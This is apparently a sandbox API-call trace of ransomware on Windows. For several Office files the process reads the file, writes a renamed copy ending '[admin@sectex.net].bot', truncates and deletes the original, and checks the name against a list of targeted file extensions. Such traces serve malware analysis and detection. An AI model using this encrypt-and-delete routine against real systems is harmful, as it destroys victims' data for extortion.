	[0150.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\uml.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0150.903] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=392584) returned 1
	[0150.903] CloseHandle (hObject=0x3bc) returned 1
	[0150.903] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\uml.vsl")) returned 0x20
	[0150.903] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\uml.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\uml.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0150.903] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.903] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\uml.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0150.904] GetLastError () returned 0x0
	[0150.904] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x5fd88, lpOverlapped=0x0) returned 1
	[0150.913] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x5fd90, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x5fd90, lpOverlapped=0x0) returned 1
	[0150.920] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.920] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0150.920] SetEndOfFile (hFile=0x25c) returned 1
	[0150.920] CloseHandle (hObject=0x25c) returned 1
	[0150.920] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.920] SetEndOfFile (hFile=0x3bc) returned 1
	[0150.929] CloseHandle (hObject=0x3bc) returned 1
	[0150.930] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.930] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\uml.vsl")) returned 1
	[0150.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL") returned 55
	[0150.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL") returned 55
	[0150.930] lstrlenW (lpString=".doc") returned 4
	[0150.930] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0150.931] lstrlenW (lpString=".docx") returned 5
	[0150.931] lstrcmpiW (lpString1=".docx", lpString2="L.VSL") returned -1
	[0150.931] lstrlenW (lpString=".pdf") returned 4
	[0150.931] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0150.931] lstrlenW (lpString=".xls") returned 4
	[0150.931] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0150.931] lstrlenW (lpString=".xlsx") returned 5
	[0150.931] lstrcmpiW (lpString1=".xlsx", lpString2="L.VSL") returned -1
	[0150.931] lstrlenW (lpString=".ppt") returned 4
	[0150.931] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0150.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL") returned 55
	[0150.931] lstrlenW (lpString=".zip") returned 4
	[0150.931] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0150.931] lstrlenW (lpString=".rar") returned 4
	[0150.931] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0150.931] lstrlenW (lpString=".bz2") returned 4
	[0150.931] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0150.931] lstrlenW (lpString=".7z") returned 3
	[0150.931] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0150.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL") returned 55
	[0150.931] lstrlenW (lpString=".dbf") returned 4
	[0150.931] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0150.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL") returned 55
	[0150.931] lstrlenW (lpString=".1cd") returned 4
	[0150.931] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0150.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL") returned 55
	[0150.931] lstrlenW (lpString=".jpg") returned 4
	[0150.931] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0150.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL") returned 55
	[0150.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL") returned 55
	[0150.931] lstrlenW (lpString=".doc") returned 4
	[0150.932] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0150.932] lstrlenW (lpString=".docx") returned 5
	[0150.932] lstrcmpiW (lpString1=".docx", lpString2="L.VSL") returned -1
	[0150.932] lstrlenW (lpString=".pdf") returned 4
	[0150.932] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0150.932] lstrlenW (lpString=".xls") returned 4
	[0150.932] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0150.932] lstrlenW (lpString=".xlsx") returned 5
	[0150.932] lstrcmpiW (lpString1=".xlsx", lpString2="L.VSL") returned -1
	[0150.932] lstrlenW (lpString=".ppt") returned 4
	[0150.932] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0150.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL") returned 55
	[0150.932] lstrlenW (lpString=".zip") returned 4
	[0150.932] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0150.932] lstrlenW (lpString=".rar") returned 4
	[0150.932] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0150.932] lstrlenW (lpString=".bz2") returned 4
	[0150.932] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0150.932] lstrlenW (lpString=".7z") returned 3
	[0150.932] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0150.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL") returned 55
	[0150.932] lstrlenW (lpString=".dbf") returned 4
	[0150.932] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0150.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL") returned 55
	[0150.932] lstrlenW (lpString=".1cd") returned 4
	[0150.932] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0150.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UML.VSL") returned 55
	[0150.932] lstrlenW (lpString=".jpg") returned 4
	[0150.932] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0150.933] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0150.933] lstrlenW (lpString="UmOutlookStrings.dll") returned 20
	[0150.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\umoutlookstrings.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0150.933] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=61312) returned 1
	[0150.933] CloseHandle (hObject=0x3bc) returned 1
	[0150.933] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\umoutlookstrings.dll")) returned 0x20
	[0150.933] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\umoutlookstrings.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\umoutlookstrings.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0150.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll") returned 68
	[0150.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll") returned 68
	[0150.934] lstrlenW (lpString=".doc") returned 4
	[0150.934] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0150.934] lstrlenW (lpString=".docx") returned 5
	[0150.934] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1
	[0150.934] lstrlenW (lpString=".pdf") returned 4
	[0150.934] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0150.934] lstrlenW (lpString=".xls") returned 4
	[0150.934] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0150.934] lstrlenW (lpString=".xlsx") returned 5
	[0150.934] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1
	[0150.934] lstrlenW (lpString=".ppt") returned 4
	[0150.934] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0150.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll") returned 68
	[0150.934] lstrlenW (lpString=".zip") returned 4
	[0150.934] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0150.934] lstrlenW (lpString=".rar") returned 4
	[0150.934] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0150.934] lstrlenW (lpString=".bz2") returned 4
	[0150.934] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0150.934] lstrlenW (lpString=".7z") returned 3
	[0150.934] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0150.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll") returned 68
	[0150.934] lstrlenW (lpString=".dbf") returned 4
	[0150.934] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0150.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll") returned 68
	[0150.934] lstrlenW (lpString=".1cd") returned 4
	[0150.934] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0150.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll") returned 68
	[0150.935] lstrlenW (lpString=".jpg") returned 4
	[0150.935] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0150.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll") returned 68
	[0150.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll") returned 68
	[0150.935] lstrlenW (lpString=".doc") returned 4
	[0150.935] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0150.935] lstrlenW (lpString=".docx") returned 5
	[0150.935] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1
	[0150.935] lstrlenW (lpString=".pdf") returned 4
	[0150.935] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0150.935] lstrlenW (lpString=".xls") returned 4
	[0150.935] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0150.935] lstrlenW (lpString=".xlsx") returned 5
	[0150.935] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1
	[0150.935] lstrlenW (lpString=".ppt") returned 4
	[0150.935] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0150.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll") returned 68
	[0150.935] lstrlenW (lpString=".zip") returned 4
	[0150.935] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0150.935] lstrlenW (lpString=".rar") returned 4
	[0150.935] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0150.935] lstrlenW (lpString=".bz2") returned 4
	[0150.935] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0150.935] lstrlenW (lpString=".7z") returned 3
	[0150.935] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0150.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll") returned 68
	[0150.935] lstrlenW (lpString=".dbf") returned 4
	[0150.935] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0150.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll") returned 68
	[0150.935] lstrlenW (lpString=".1cd") returned 4
	[0150.936] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0150.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\UmOutlookStrings.dll") returned 68
	[0150.936] lstrlenW (lpString=".jpg") returned 4
	[0150.936] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0150.936] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0150.936] lstrlenW (lpString="VALVE.VRD") returned 9
	[0150.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\valve.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298
	[0152.416] GetFileSizeEx (in: hFile=0x298, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1868) returned 1
	[0152.416] CloseHandle (hObject=0x298) returned 1
	[0152.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\valve.vrd")) returned 0x20
	[0152.456] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\valve.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\valve.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0152.456] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.456] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\valve.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0152.457] GetLastError () returned 0x0
	[0152.457] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x74c, lpOverlapped=0x0) returned 1
	[0152.484] WriteFile (in: hFile=0x3ac, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x750, lpOverlapped=0x0) returned 1
	[0152.485] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.485] WriteFile (in: hFile=0x3ac, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0152.485] SetEndOfFile (hFile=0x3ac) returned 1
	[0152.485] CloseHandle (hObject=0x3ac) returned 1
	[0152.486] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.486] SetEndOfFile (hFile=0x31c) returned 1
	[0152.488] CloseHandle (hObject=0x31c) returned 1
	[0152.488] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.498] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\valve.vrd")) returned 1
	[0152.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD") returned 57
	[0152.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD") returned 57
	[0152.498] lstrlenW (lpString=".doc") returned 4
	[0152.498] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0152.499] lstrlenW (lpString=".docx") returned 5
	[0152.499] lstrcmpiW (lpString1=".docx", lpString2="E.VRD") returned -1
	[0152.499] lstrlenW (lpString=".pdf") returned 4
	[0152.499] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0152.499] lstrlenW (lpString=".xls") returned 4
	[0152.499] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0152.499] lstrlenW (lpString=".xlsx") returned 5
	[0152.499] lstrcmpiW (lpString1=".xlsx", lpString2="E.VRD") returned -1
	[0152.499] lstrlenW (lpString=".ppt") returned 4
	[0152.499] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0152.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD") returned 57
	[0152.499] lstrlenW (lpString=".zip") returned 4
	[0152.499] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0152.499] lstrlenW (lpString=".rar") returned 4
	[0152.499] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0152.499] lstrlenW (lpString=".bz2") returned 4
	[0152.499] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0152.499] lstrlenW (lpString=".7z") returned 3
	[0152.499] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0152.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD") returned 57
	[0152.499] lstrlenW (lpString=".dbf") returned 4
	[0152.499] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0152.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD") returned 57
	[0152.499] lstrlenW (lpString=".1cd") returned 4
	[0152.499] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0152.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD") returned 57
	[0152.499] lstrlenW (lpString=".jpg") returned 4
	[0152.499] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0152.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD") returned 57
	[0152.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD") returned 57
	[0152.499] lstrlenW (lpString=".doc") returned 4
	[0152.500] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0152.500] lstrlenW (lpString=".docx") returned 5
	[0152.500] lstrcmpiW (lpString1=".docx", lpString2="E.VRD") returned -1
	[0152.500] lstrlenW (lpString=".pdf") returned 4
	[0152.500] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0152.500] lstrlenW (lpString=".xls") returned 4
	[0152.500] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0152.500] lstrlenW (lpString=".xlsx") returned 5
	[0152.500] lstrcmpiW (lpString1=".xlsx", lpString2="E.VRD") returned -1
	[0152.500] lstrlenW (lpString=".ppt") returned 4
	[0152.500] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0152.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD") returned 57
	[0152.500] lstrlenW (lpString=".zip") returned 4
	[0152.500] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0152.500] lstrlenW (lpString=".rar") returned 4
	[0152.500] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0152.500] lstrlenW (lpString=".bz2") returned 4
	[0152.500] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0152.500] lstrlenW (lpString=".7z") returned 3
	[0152.500] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0152.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD") returned 57
	[0152.500] lstrlenW (lpString=".dbf") returned 4
	[0152.500] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0152.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD") returned 57
	[0152.500] lstrlenW (lpString=".1cd") returned 4
	[0152.500] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0152.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VALVE.VRD") returned 57
	[0152.500] lstrlenW (lpString=".jpg") returned 4
	[0152.500] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0152.501] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0152.501] lstrlenW (lpString="VISCOLOR.VSL") returned 12
	[0152.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\viscolor.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0152.516] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=43392) returned 1
	[0152.516] CloseHandle (hObject=0x3ac) returned 1
	[0152.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\viscolor.vsl")) returned 0x20
	[0152.517] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\viscolor.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\viscolor.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0152.552] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.552] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\viscolor.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0152.565] GetLastError () returned 0x0
	[0152.565] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xa980, lpOverlapped=0x0) returned 1
	[0152.582] WriteFile (in: hFile=0x388, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xa990, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xa990, lpOverlapped=0x0) returned 1
	[0152.584] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.584] WriteFile (in: hFile=0x388, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.584] SetEndOfFile (hFile=0x388) returned 1
	[0152.584] CloseHandle (hObject=0x388) returned 1
	[0152.584] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.584] SetEndOfFile (hFile=0x3ac) returned 1
	[0152.587] CloseHandle (hObject=0x3ac) returned 1
	[0152.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISCOLOR.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
